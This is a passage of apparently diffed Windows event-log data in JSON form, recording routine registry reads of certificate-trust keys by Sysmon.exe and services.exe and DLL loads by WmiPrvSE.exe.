"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": 
"cfgbkend.dll", - "image_path": "C:\\Windows\\System32\\cfgbkend.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, 
- "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848390000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": 
